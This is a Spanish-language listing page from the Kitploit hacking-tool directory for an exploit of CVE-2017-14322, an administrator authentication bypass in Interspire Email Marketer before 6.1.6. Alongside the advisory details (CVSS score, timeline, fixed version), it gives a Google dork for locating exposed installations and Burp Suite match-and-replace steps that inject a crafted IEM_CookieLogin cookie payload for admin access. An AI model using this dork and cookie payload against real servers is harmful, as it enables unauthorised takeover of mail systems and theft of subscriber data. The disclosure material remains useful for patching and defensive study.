Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-14322 — CVE-2017-14322 Exploit de Interspire Email Marketer (emailmarketer) | Kitploit
Herramientas/GitHubGitHub/joesmithjaffa/cve-2017-14322
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubjoesmithjaffa/cve-2017-14322

CVE-2017-14322

CVE-2017-14322 Exploit de Interspire Email Marketer (emailmarketer)

Ver Repositorio
512hace 8 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2017-14322 Exploit de Interspire Email Marketer (emailmarketer)

Google Dork

root@kitploit:~
intitle:"Control Panel" + emailmarketer

Exploit usando Burp Suit

Añade un Match y Replace para el encabezado de solicitud como se muestra a continuación:

root@kitploit:~
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D

Cuando abras el sitio, no funcionará la primera vez porque el encabezado Cookie no está presente. Actualiza el sitio una segunda vez usando el proxy de Burp con la regla anterior añadida, verás lo que querías. Asegúrate de marcar "Intercept Client Requests"

Título:

Interspire Email Marketer - Bypass de autenticación de administrador remoto

Autor:

Hakan Küsne, Infoteam Security (CH)

CVE-ID:

CVE-2017-14322

Información de riesgo:

Puntuación base CVSS: 9.8 Vector CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O

Cronología:

2017-09-12 Vulnerabilidad descubierta 2017-09-12 Se descubrió que el proveedor ya lo había corregido, pero nunca lo comunicó a los clientes, dejando a cientos vulnerables en el mundo real 2017-10-17 Divulgación pública

Productos afectados:

Interspire Email Marketer anterior a la versión 6.1.6

Sitio web del proveedor:

http://www.interspire.com/emailmarketer/

Detalles:

La función encargada de comprobar si el usuario ya ha iniciado sesión en init.php de Interspire Email Marketer (IEM) anterior a 6.1.6 permite a los atacantes remotos omitir la autenticación y obtener acceso administrativo mediante el uso de la cookie IEM_CookieLogin con un valor especialmente manipulado. Además, si el cliente no tiene un plan de mantenimiento anual, la aplicación dice que está en la última versión disponible y que no hay actualización.

Las vulnerabilidades se encontraron durante una respuesta a incidentes en una instancia comprometida de la aplicación.

Prueba de concepto:

Detalles proporcionados aquí : https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

Solución:

El proveedor ha parcheado la vulnerabilidad en la versión 6.1.6, pero nunca se lo comunicó específicamente a sus clientes.

Nota:

Este exploit es solo con fines educativos y no se hace responsable de tus propias acciones.

Descargar herramienta